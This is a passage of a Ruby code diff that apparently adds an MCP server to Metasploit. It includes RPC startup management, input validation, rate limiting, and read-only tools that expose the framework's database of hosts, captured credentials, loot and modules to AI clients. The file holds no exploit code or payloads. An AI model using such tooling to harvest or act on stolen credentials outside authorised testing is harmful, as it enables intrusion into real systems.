'PeerHost' => host,
'PeerPort' => port
)
socket.close
dlog({ message: "RPC server is available at #{Rex::Socket.to_authority(host, port)}" },
LOG_SOURCE, LOG_DEBUG)
true
rescue Rex::ConnectionError
false
end
# Whether auto-start is enabled based on config, API type, and host.
#
# Auto-start is only supported for:
# - MessagePack API type (not JSON-RPC)
# - Localhost connections (cannot start a remote RPC server)
# - When auto_start_rpc config is not explicitly false
#
# @return [Boolean]
def auto_start_enabled?
return false if @config[:msf_api][:type] != 'messagepack'
return false unless localhost?
return false if @config[:msf_api][:auto_start_rpc] == false
true
end
# Start the Metasploit RPC server by spawning msfrpcd.
#
# Credentials are passed via environment variables to avoid exposing
# them on the command line.
#
# @return [void]
# @raise [Msf::MCP::Metasploit::RpcStartupError] If the server cannot be started
def start_rpc_server
if @rpc_managed
@output.puts 'RPC server is already managed by this process'
return
end
@output.puts 'Starting Metasploit RPC server...'
ilog({ message: 'Starting Metasploit RPC server' },
LOG_SOURCE, LOG_INFO)
unless File.executable?(MSFRPCD_PATH)
raise Msf::MCP::Metasploit::RpcStartupError,
'msfrpcd executable not found. Cannot auto-start RPC server.'
end
args = build_msfrpcd_args
env = {
'MSF_RPC_USER' => @config[:msf_api][:user].to_s,
'MSF_RPC_PASS' => @config[:msf_api][:password].to_s
}
pid = Process.spawn(env, MSFRPCD_PATH, *args, %i[out err] => File::NULL)
@rpc_pid = pid
@rpc_managed = true
@output.puts "RPC server started via msfrpcd (PID: #{pid})"
end
# Wait for the RPC server to become available.
#
# @param timeout [Integer] Maximum seconds to wait (default: 30)
# @param interval [Integer] Seconds between probes (default: 1)
# @return [true] When the server becomes available
# @raise [Msf::MCP::Metasploit::ConnectionError] If timeout is reached
# @raise [Msf::MCP::Metasploit::RpcStartupError] If the managed process exits
def wait_for_rpc(timeout: DEFAULT_WAIT_TIMEOUT, interval: DEFAULT_WAIT_INTERVAL)
deadline = Time.now + timeout
loop do
if rpc_available?
@output.puts 'RPC server is ready'
return true
end
check_managed_process_alive! if @rpc_managed
if Time.now >= deadline
raise Msf::MCP::Metasploit::ConnectionError,
"Timed out waiting for RPC server after #{timeout} seconds"
end
@output.puts 'Waiting for RPC server to become available...'
sleep(interval)
end
end
# Stop the managed RPC server process.
#
# @return [void]
def stop_rpc_server
return unless @rpc_managed
@output.puts 'Stopping managed RPC server...'
ilog({ message: "Stopping managed RPC server (PID: #{@rpc_pid})" },
LOG_SOURCE, LOG_INFO)
begin
Process.kill('TERM', @rpc_pid)
graceful_wait
rescue Errno::ESRCH
# Process already dead — that's fine
rescue Errno::EPERM
@output.puts "Warning: no permission to stop RPC process #{@rpc_pid}"
end
@rpc_pid = nil
@rpc_managed = false
end
# Ensure an RPC server is available, auto-starting if needed.
#
# When the RPC server is already listening, verifies that credentials
# (or a token for JSON-RPC) are available for the caller to authenticate.
#
# When the server is not available, auto-start is attempted only for
# MessagePack on localhost with auto_start_rpc enabled. Random
# credentials are generated when none are provided.
#
# @return [void]
# @raise [Msf::MCP::Metasploit::RpcStartupError] If the server cannot be
# reached and auto-start is not possible, or if the server is running
# but no credentials/token were provided
def ensure_rpc_available
if rpc_available?
@output.puts 'Metasploit RPC server is already running'
validate_credentials_for_existing_server!
return
end
if @config[:msf_api][:type] == 'json-rpc'
raise Msf::MCP::Metasploit::RpcStartupError,
'RPC server is not running and auto-start is not supported for JSON-RPC API type.'
end
unless localhost?
message = "RPC server is not available at #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]}."
message << ' Cannot auto-start RPC on remote hosts. Please start the RPC server manually.' if auto_start_enabled?
raise Msf::MCP::Metasploit::RpcStartupError, message
end
unless auto_start_enabled?
raise Msf::MCP::Metasploit::RpcStartupError,
"RPC server is not running on #{@config[:msf_api][:host]}:#{@config[:msf_api][:port]} " \
'and auto-start is disabled.'
end
generate_random_credentials unless credentials_provided?
start_rpc_server
wait_for_rpc
end
private
# Absolute path to msfrpcd relative to the framework root.
MSFRPCD_PATH = File.join(__dir__, '../../../..', 'msfrpcd').freeze
# Build command-line arguments for msfrpcd.
#
# Note: credentials are passed via environment variables (MSF_RPC_USER,
# MSF_RPC_PASS) rather than command-line arguments for security.
#
# @return [Array<String>]
def build_msfrpcd_args
args = ['-f'] # foreground mode
args.push('-a', @config[:msf_api][:host].to_s)
args.push('-p', @config[:msf_api][:port].to_s)
args.push('-S') if @config[:msf_api][:ssl] == false
args
end
# Check whether the host is a localhost address.
#
# @return [Boolean]
def localhost?
LOCALHOST_HOSTS.include?(@config[:msf_api][:host].to_s.downcase)
end
# Whether both user and password are present in the configuration.
#
# @return [Boolean]
def credentials_provided?
user = @config[:msf_api][:user]
password = @config[:msf_api][:password]
!user.to_s.strip.empty? && !password.to_s.strip.empty?
end
# Whether the BEARER token is present in the configuration.
#
# @return [Boolean]
def token_provided?
token = @config[:msf_api][:token]
!token.to_s.strip.empty?
end
# Verify that the caller has credentials to authenticate with an
# already-running RPC server. For MessagePack this means user+password;
# for JSON-RPC this means a bearer token.
#
# @raise [Msf::MCP::Metasploit::RpcStartupError] If required credentials
# are missing
def validate_credentials_for_existing_server!
if @config[:msf_api][:type] == 'json-rpc'
return if token_provided?
raise Msf::MCP::Metasploit::RpcStartupError,
'RPC server is already running but no token was provided. ' \
'Use --token option or MSF_API_TOKEN environment variable.'
else
return if credentials_provided?
raise Msf::MCP::Metasploit::RpcStartupError,
'RPC server is already running but no credentials were provided. ' \
'Use --user and --password options or MSF_API_USER and MSF_API_PASSWORD environment variables.'
end
end
# Generate random credentials and write them into the config hash.
#
# @return [void]
def generate_random_credentials
@config[:msf_api][:user] = SecureRandom.hex(8)
@config[:msf_api][:password] = SecureRandom.hex(16)
@output.puts 'Generated random credentials for auto-started RPC server'
ilog({ message: 'Generated random credentials for auto-started RPC server' },
LOG_SOURCE, LOG_INFO)
end
# Check if the managed child process is still alive.
# Raises RpcStartupError if it has exited.
def check_managed_process_alive!
return unless @rpc_pid
result = Process.waitpid(@rpc_pid, Process::WNOHANG)
return unless result
@rpc_pid = nil
@rpc_managed = false
raise Msf::MCP::Metasploit::RpcStartupError, 'RPC server process exited unexpectedly'
end
# Wait for the child process to exit after SIGTERM, escalating to
# SIGKILL if it does not exit within the grace period.
def graceful_wait
result = Process.waitpid(@rpc_pid, Process::WNOHANG)
return if result
sleep(STOP_GRACE_PERIOD)
result = Process.waitpid(@rpc_pid, Process::WNOHANG)
return if result
# Process did not exit; escalate to SIGKILL
Process.kill('KILL', @rpc_pid)
Process.waitpid(@rpc_pid, 0)
end
end
end
@@ -0,0 +1,197 @@
# frozen_string_literal: true
require 'ipaddr'
module Msf::MCP
module Security
class InputValidator
LIMIT_DEFAULT = 100
LIMIT_MIN = 1
LIMIT_MAX = 1000
# Generic parameter validation against a constraint
#
# Dispatches based on the constraint type:
# - Array → value must be included in the list (enum)
# - Range → value must be an integer within the range, or a Range whose
# bounds are within the constraint (range must be integer-bounded)
# - Regexp → value (via .to_s) must match the pattern
#
# @param name [String] Parameter name (used in error messages)
# @param value [Object] Value to validate
# @param constraint [Array, Range, Regexp] Allowed values, range, or pattern
# @param allow_nil [Boolean] Whether nil/empty values are allowed (default: false)
# @param max_size [Integer] (optional) Maximum length for string values (only applies to Regexp constraints)
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_parameter!(name, value, constraint, allow_nil: false, max_size: nil)
if allow_nil
return true if value.nil?
return true if value.respond_to?(:empty?) && value.empty?
else
raise ValidationError, "#{name} cannot be nil" if value.nil?
raise ValidationError, "#{name} cannot be empty" if value.respond_to?(:empty?) && value.empty?
end
case constraint
when Array
unless constraint.include?(value)
raise ValidationError, "Invalid #{name}: #{value.inspect}. Must be one of: #{constraint.join(', ')}"
end
when Range
unless constraint.first.is_a?(Integer) && constraint.last.is_a?(Integer)
raise ArgumentError, "Range constraint must be a range of integers, got #{constraint.first.class}..#{constraint.last.class}"
end
if value.is_a?(Range)
begin
int_first = Integer(value.first)
int_last = Integer(value.last)
rescue TypeError, ArgumentError
raise ValidationError, "#{name} must have integer bounds: #{value.inspect}"
end
unless constraint.cover?(int_first..int_last)
raise ValidationError, "#{name} must be between #{constraint.min} and #{constraint.max}: #{int_first}..#{int_last}"
end
else
begin
int_value = Integer(value)
rescue TypeError, ArgumentError
raise ValidationError, "#{name} must be an integer: #{value.inspect}"
end
unless constraint.cover?(int_value)
raise ValidationError, "#{name} must be between #{constraint.min} and #{constraint.max}: #{value}"
end
end
when Regexp
string_value = value.to_s
if max_size && string_value.length > max_size
raise ValidationError, "#{name} too long (max #{max_size} characters)"
end
unless string_value.match?(constraint)
raise ValidationError, "Invalid #{name} format: #{value}"
end
else
raise ArgumentError, "Unsupported constraint type: #{constraint.class}"
end
true
end
# Validate IP address or CIDR range
#
# @param addr [String] IP address or CIDR (e.g., "192.168.1.1" or "192.168.1.0/24")
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_ip_address!(addr)
return true if addr.nil? || addr.empty?
begin
IPAddr.new(addr)
true
rescue IPAddr::InvalidAddressError
raise ValidationError, "Invalid IP address or CIDR: #{addr}"
end
end
# Validate port or port range
#
# @param range [String, Integer] Port number or range (e.g., "80" or "80-443")
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_port_range!(range)
return true if range.nil? || range.to_s.empty?
range_str = range.to_s
# Match a port range like "80-443" — requires digits on both sides of the dash
if range_str.match?(/\A\s*[[:alnum:]]+-[[:alnum:]]+\s*\z/)
begin
start_port, end_port = range_str.split('-', 2).map { |p| Integer(p.strip) }
rescue TypeError, ArgumentError
raise ValidationError, "Port range must have integer bounds: #{range_str}"
end
validate_parameter!('Port range', start_port..end_port, 1..65535)
else
validate_parameter!('Port', range_str, 1..65535)
end
true
end
# Validate query string for module search
#
# @param query [String] Search query
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_search_query!(query)
validate_parameter!('Search query', query, /\A[[:print:]]+\z/, allow_nil: false, max_size: 500)
end
# Validate limit parameter for pagination
#
# @param limit [Integer] Limit value
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_limit!(limit)
validate_parameter!('Limit', limit, LIMIT_MIN..LIMIT_MAX, allow_nil: true)
end
# Validate offset parameter for pagination
#
# @param offset [Integer] Offset value
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_offset!(offset)
validate_parameter!('Offset', offset, 0..LIMIT_MAX, allow_nil: true)
end
# Validate pagination parameters
#
# @param limit [Integer] Limit value
# @param offset [Integer] Offset value
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_pagination!(limit, offset)
validate_limit!(limit)
validate_offset!(offset)
end
# Validate module type
#
# @param module_type [String] Module type
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_module_type!(module_type)
validate_parameter!('Module type', module_type, %w[exploit auxiliary post payload encoder evasion nop])
end
# Validate module name
#
# @param module_name [String] Module name/path
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_module_name!(module_name)
# Basic path validation (alphanumeric, slashes, underscores, hyphens)
validate_parameter!('Module name', module_name, %r{\A[\w/\-]+\z}, max_size: 500)
end
# Validate only_up boolean parameter
#
# @param only_up [Boolean] Only up parameter
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_only_up!(only_up)
validate_parameter!('only_up', only_up, [true, false])
end
# Validate protocol parameter
#
# @param protocol [String] Protocol ('tcp' or 'udp')
# @return [true] If valid
# @raise [ValidationError] If invalid
def self.validate_protocol!(protocol)
validate_parameter!('Protocol', protocol.to_s.downcase, %w[tcp udp], allow_nil: true)
end
end
end
end
+58
View File
@@ -0,0 +1,58 @@
# frozen_string_literal: true
module Msf::MCP
module Security
class RateLimiter
#attr_reader :requests_per_minute, :burst_size
# Initialize rate limiter with token bucket algorithm
#
# @param requests_per_minute [Integer] Maximum requests per minute
# @param burst_size [Integer] Maximum burst size (default: same as requests_per_minute)
def initialize(requests_per_minute: 60, burst_size: nil)
@requests_per_minute = requests_per_minute
@burst_size = burst_size || requests_per_minute
@tokens = @burst_size.to_f
@last_refill = Time.now
@mutex = Mutex.new
end
# Check if request is allowed, consume token if yes
#
# @param tool_name [String, nil] Tool name (for logging/tracking)
# @return [Integer] Number of tokens,if request allowed
# @raise [RateLimitExceededError] If rate limit exceeded
def check_rate_limit!(tool_name = nil)
@mutex.synchronize do
refill!
if @tokens >= 1.0
@tokens -= 1.0
else
# Calculate retry_after in seconds
tokens_per_second = @requests_per_minute / 60.0
retry_after = ((1.0 - @tokens) / tokens_per_second).ceil
raise RateLimitExceededError.new(retry_after)
end
end
end
private
# Refill tokens based on elapsed time
def refill!
now = Time.now
elapsed = now - @last_refill
# Calculate tokens to add based on elapsed time
tokens_per_second = @requests_per_minute / 60.0
tokens_to_add = elapsed * tokens_per_second
# Add tokens but cap at burst_size
@tokens = [@tokens + tokens_to_add, @burst_size.to_f].min
@last_refill = now
end
end
end
end
+242
View File
@@ -0,0 +1,242 @@
# frozen_string_literal: true
module Msf::MCP
##
# MCP Server Wrapper for Metasploit Framework
#
# This class initializes and manages the MCP server with all registered tools.
# It provides a clean interface for starting/stopping the server and integrates
# with the Metasploit client and security layers.
#
# The Server expects fully configured and authenticated dependencies to be
# provided during initialization. It does not handle configuration loading
# or client authentication - those are responsibilities of the calling code.
#
class Server
##
# Initialize the MCP server with required dependencies
#
# @param msf_client [Metasploit::Client] Configured and authenticated Metasploit client
# @param rate_limiter [Security::RateLimiter] Configured rate limiter
#
def initialize(msf_client:, rate_limiter:)
@msf_client = msf_client
# Create server context (passed to all tool calls)
# Tools only need msf_client and rate_limiter
@server_context = {
msf_client: @msf_client,
rate_limiter: rate_limiter
}
# Create MCP configuration with request lifecycle callbacks
mcp_config = ::MCP::Configuration.new
mcp_config.around_request = create_around_request
mcp_config.exception_reporter = create_exception_reporter
# Initialize MCP server with all tools
@mcp_server = ::MCP::Server.new(
name: 'msfmcp',
version: Msf::MCP::Application::VERSION,
tools: [
Tools::SearchModules,
Tools::ModuleInfo,
Tools::HostInfo,
Tools::ServiceInfo,
Tools::VulnerabilityInfo,
Tools::NoteInfo,
Tools::CredentialInfo,
Tools::LootInfo
],
server_context: @server_context,
configuration: mcp_config
)
end
##
# Start the MCP server with specified transport
#
# @param transport [Symbol] Transport type (:stdio or :http)
# @param host [String] Host address for HTTP transport (default: 'localhost')
# @param port [Integer] Port number for HTTP transport (default: 3000)
#
# @return [MCP::Server] The MCP server instance (for testing purposes)
# @raise [ArgumentError] If an unknown transport is specified
#
def start(transport: :stdio, host: 'localhost', port: 3000)
case transport
when :stdio
start_stdio
when :http
start_http(host, port)
else
raise ArgumentError, "Unknown transport: #{transport}. Use :stdio or :http"
end
end
##
# Shutdown the MCP server and cleanup resources
#
def shutdown
@msf_client&.shutdown
@mcp_server = nil
end
private
##
# Start stdio transport (for CLI usage)
#
# @return [MCP::Server] The MCP server instance (for testing purposes)
#
def start_stdio
transport = ::MCP::Server::Transports::StdioTransport.new(@mcp_server)
transport.open
@mcp_server
end
##
# Start HTTP transport (for web/network usage)
#
# The transport implements the Rack app interface (#call), so it is mounted
# directly. MCP-aware request/response logging is handled by the
# Middleware::RequestLogger middleware.
#
# @param host [String] Host address to bind to
# @param port [Integer] Port to listen on
#
# @return [MCP::Server] The MCP server instance (for testing purposes)
#
def start_http(host, port)
require 'rack'
require 'rack/handler/puma'
transport = ::MCP::Server::Transports::StreamableHTTPTransport.new(@mcp_server)
# Build the Rack application with logging middleware.
# The transport itself is a Rack app (implements #call).
rack_app = Rack::Builder.new do
use Msf::MCP::Middleware::RequestLogger
run transport
end
# Start Puma server using the handler appropriate for the Rack version.
# Rackup::Handler is available with rackup >= 2.x / Rack 3+;
# Rack::Handler is used with Rack < 3 and rackup 1.x.
puma_handler = if defined?(Rackup::Handler)
Rackup::Handler::Puma
else
Rack::Handler::Puma
end
puma_handler.run(
rack_app,
Port: port,
Host: host,
Silent: true
)
@mcp_server
end
##
# Create around_request callback for MCP SDK
#
# This callback wraps every JSON-RPC request handler, providing access to
# both the instrumentation data and the response result. It replaces the
# deprecated +instrumentation_callback+ which only fires after completion
# and does not expose the result.
#
# The +data+ hash is populated by the SDK with:
# - :method — the JSON-RPC method name (e.g. "tools/call", "tools/list")
# - :tool_name, :prompt_name, :resource_uri — specific handler identifiers
# - :tool_arguments — arguments passed to a tool call
# - :client — client info hash (name, version)
# - :error — error type symbol (e.g. :tool_not_found, :internal_error)
# - :duration — added in the ensure block after this callback returns
#
# @return [Proc] Callback that wraps request execution and logs via Rex
#
def create_around_request
->(data, &request_handler) do
result = request_handler.call
# Build message based on the type of request
message = if data[:error]
"MCP Error: #{data[:error]}"
elsif data[:tool_name]
"Tool call: #{data[:tool_name]}"
elsif data[:prompt_name]
"Prompt call: #{data[:prompt_name]}"
elsif data[:resource_uri]
"Resource call: #{data[:resource_uri]}"
elsif data[:method]
"Method call: #{data[:method]}"
else
"MCP request"
end
context = data.dup
if result
message = "#{message} (ERROR)" if result[:isError]
context[:result] = result
end
if data[:error] || result&.fetch(:isError, nil)
elog({ message: message, context: context }, LOG_SOURCE, LOG_ERROR)
else
ilog({ message: message, context: context }, LOG_SOURCE, LOG_INFO)
end
result
end
end
##
# Create exception reporter callback for MCP SDK
#
# This callback is invoked for any server exception during request processing,
# which are not tool execution errors.
# It receives:
# - exception: The Ruby exception object
# - context: Hash with :request (JSON string) or :notification (method name string)
#
# @return [Proc] Callback that logs exceptions via Rex
#
def create_exception_reporter
->(exception, context) do
return unless exception || context
# Determine the context type and parse data
error_context = {}
if context&.fetch(:request, nil)
error_context[:type] = 'request'
request = nil
begin
request = JSON.parse(context[:request])
rescue JSON::ParserError
# Not valid JSON, log raw data
error_context[:raw_data] = context[:request].inspect
else
error_context[:method] = request['method'] if request['method']
error_context[:params] = request['params'] if request['params']
end
elsif context&.fetch(:notification, nil)
error_context[:type] = 'notification'
# context[:notification] is the notification method name (string)
error_context[:method] = context[:notification]
else
error_context[:type] = 'unknown'
error_context[:raw_data] = context.inspect
end
elog({
message: "Error during #{error_context[:type]} processing#{error_context[:method] ? " (#{error_context[:method]})" : ''}",
exception: exception,
context: error_context
}, LOG_SOURCE, LOG_ERROR)
end
end
end
end
+159
View File
@@ -0,0 +1,159 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Credentials
#
# Retrieves credential information from the Metasploit database including
# usernames, password hashes, and authentication data.
#
class CredentialInfo < ::MCP::Tool
tool_name 'msf_credential_info'
description 'Query Metasploit database for discovered credentials. '\
'Returns credential information including usernames and password data.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
},
required: [:workspace]
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
host: { type: 'string' },
port: { type: 'integer' },
protocol: { type: 'string' },
service_name: { type: 'string' },
user: { type: 'string' },
secret: { type: 'string' },
type: { type: 'string' },
updated_at: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute credential query with secure memory handling
#
# @param workspace [String] Workspace name (default: 'default')
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with credential information
#
def call(workspace: 'default', limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('credential_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
raw_creds = msf_client.db_creds(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_creds(raw_creds)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+177
View File
@@ -0,0 +1,177 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Hosts
#
# Retrieves host information from the Metasploit database including
# IP addresses, operating systems, and discovery metadata.
#
class HostInfo < ::MCP::Tool
tool_name 'msf_host_info'
description 'Query Metasploit database for discovered hosts. '\
'Returns host information including IP, OS, MAC address, and metadata.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
addresses: {
type: 'string',
description: 'IP address or CIDR range to filter (e.g., "192.168.1.100" or "192.168.1.0/24")'
},
only_up: {
type: 'boolean',
description: 'Filter to only return hosts that are up',
default: false
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
}
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
created_at: { type: 'string' },
address: { type: 'string' },
mac_address: { type: 'string' },
hostname: { type: 'string' },
state: { type: 'string' },
os_name: { type: 'string' },
os_flavor: { type: 'string' },
os_service_pack: { type: 'string' },
os_language: { type: 'string' },
updated_at: { type: 'string' },
purpose: { type: 'string' },
info: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute host query
#
# @param workspace [String] Workspace name (default: 'default')
# @param addresses [String, nil] IP address or CIDR range to filter
# @param only_up [Boolean] Filter to only return hosts that are up
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with host information
#
def call(workspace: 'default', addresses: nil, only_up: false, limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('host_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_only_up!(only_up)
Msf::MCP::Security::InputValidator.validate_ip_address!(addresses) if addresses
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
options[:addresses] = addresses if addresses
options[:only_up] = only_up if only_up
raw_hosts = msf_client.db_hosts(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_hosts(raw_hosts)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+161
View File
@@ -0,0 +1,161 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Query Metasploit Database Loot
#
# Retrieves loot information from the Metasploit database including
# collected files, data, and artifacts from compromised systems.
#
class LootInfo < ::MCP::Tool
tool_name 'msf_loot_info'
description 'Query Metasploit database for collected loot. '\
'Returns loot information including file paths and content types.'
input_schema(
properties: {
workspace: {
type: 'string',
description: 'Workspace name (default: "default")',
default: 'default'
},
limit: {
type: 'integer',
description: 'Maximum number of results',
minimum: Msf::MCP::Security::InputValidator::LIMIT_MIN,
maximum: Msf::MCP::Security::InputValidator::LIMIT_MAX,
default: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT
},
offset: {
type: 'integer',
description: 'Number of results to skip',
minimum: 0,
default: 0
}
},
required: [:workspace]
)
output_schema(
properties: {
metadata: {
properties: {
workspace: { type: 'string' },
query_time: { type: 'number' },
total_items: { type: 'integer' },
returned_items: { type: 'integer' },
limit: { type: 'integer' },
offset: { type: 'integer' }
}
},
data: {
type: 'array',
items: {
properties: {
host: { type: 'string' },
service_name_or_port: { type: 'string' },
loot_type: { type: 'string' },
content_type: { type: 'string' },
name: { type: 'string' },
info: { type: 'string' },
data: { type: 'string' },
created_at: { type: 'string' },
updated_at: { type: 'string' }
}
}
}
},
required: [:metadata, :data]
)
annotations(
read_only_hint: true,
idempotent_hint: true,
destructive_hint: false
)
meta({ source: 'metasploit_database' })
class << self
include ToolHelper
##
# Execute loot query
#
# @param workspace [String] Workspace name (default: 'default')
# @param limit [Integer] Maximum results (default: 100)
# @param offset [Integer] Results offset (default: 0)
# @param server_context [Hash] Server context with msf_client, rate_limiter, config
# @return [MCP::Tool::Response] Structured response with loot information
#
def call(workspace: 'default', limit: Msf::MCP::Security::InputValidator::LIMIT_DEFAULT, offset: 0, server_context:)
start_time = Time.now
# Extract dependencies from server context
msf_client = server_context[:msf_client]
rate_limiter = server_context[:rate_limiter]
# Check rate limit
rate_limiter.check_rate_limit!('loot_info')
# Validate inputs
Msf::MCP::Security::InputValidator.validate_pagination!(limit, offset)
# Call Metasploit API
# Note that `workspace` is optional in the MSF API, the default workspace is used if not provided.
# The default value is sent anyway for clarity.
options = { workspace: workspace }
raw_loot = msf_client.db_loot(options)
# Transform response
transformed = Metasploit::ResponseTransformer.transform_loot(raw_loot)
# Apply pagination
#
# Note that to get the total number of entries, we gather the entire data set and apply pagination here
# instead of sending the limit and offset to the API call to be processed by MSF.
# This is needed to provide accurate total_items count in the metadata.
total_items = transformed.size
paginated_data = transformed[offset, limit] || []
# Build metadata
metadata = {
workspace: workspace,
query_time: (Time.now - start_time).round(3),
total_items: total_items,
returned_items: paginated_data.size,
limit: limit,
offset: offset
}
# Return MCP response
::MCP::Tool::Response.new(
[
{
type: 'text',
text: JSON.generate(
metadata: metadata,
data: paginated_data
)
}
],
structured_content: {
metadata: metadata,
data: paginated_data
}
)
rescue Msf::MCP::Security::RateLimitExceededError => e
tool_error_response("Rate limit exceeded: #{e.message}")
rescue Msf::MCP::Metasploit::AuthenticationError => e
tool_error_response("Authentication failed: #{e.message}")
rescue Msf::MCP::Metasploit::APIError => e
tool_error_response("Metasploit API error: #{e.message}")
rescue Msf::MCP::Security::ValidationError => e
tool_error_response(e.message)
end
end
end
end
end
+147
View File
@@ -0,0 +1,147 @@
# frozen_string_literal: true
module Msf::MCP
module Tools
##
# MCP Tool: Get Metasploit Module Information
#
# Retrieves detailed information about a specific Metasploit module including
# options, targets, references, and compatibility details.
#
class ModuleInfo < ::MCP::Tool
tool_name 'msf_module_info'
description 'Retrieves detailed information, documentation, and options for a single specific Metasploit module. '\
'Returns comprehensive module details including options, targets, payloads, and references.'
input_schema(
properties: {
type: {
type: 'string',
description: 'Module type (exploit, auxiliary, post, payload, etc.)',
enum: ['exploit', 'auxiliary', 'post', 'payload', 'encoder', 'evasion', 'nop']
},
name: {
type: 'string',
description: 'Module path/name (e.g., windows/smb/ms17_010_eternalblue)',
minLength: 1,
maxLength: 500
}
},
required: [:type, :name]
)
output_schema(
properties: {
metadata: {
properties: {
query_time: { type: 'number' }
}
},
data: {
properties: {
# TODO: consider adding `description` fields to these properties
type: { type: 'string' },
name: { type: 'string' },
fullname: { type: 'string' },
rank: { type: 'string' },
disclosure_date: { type: 'string' },
description: { type: 'string' },
license: { type: 'string' },
filepath: { type: 'string' },
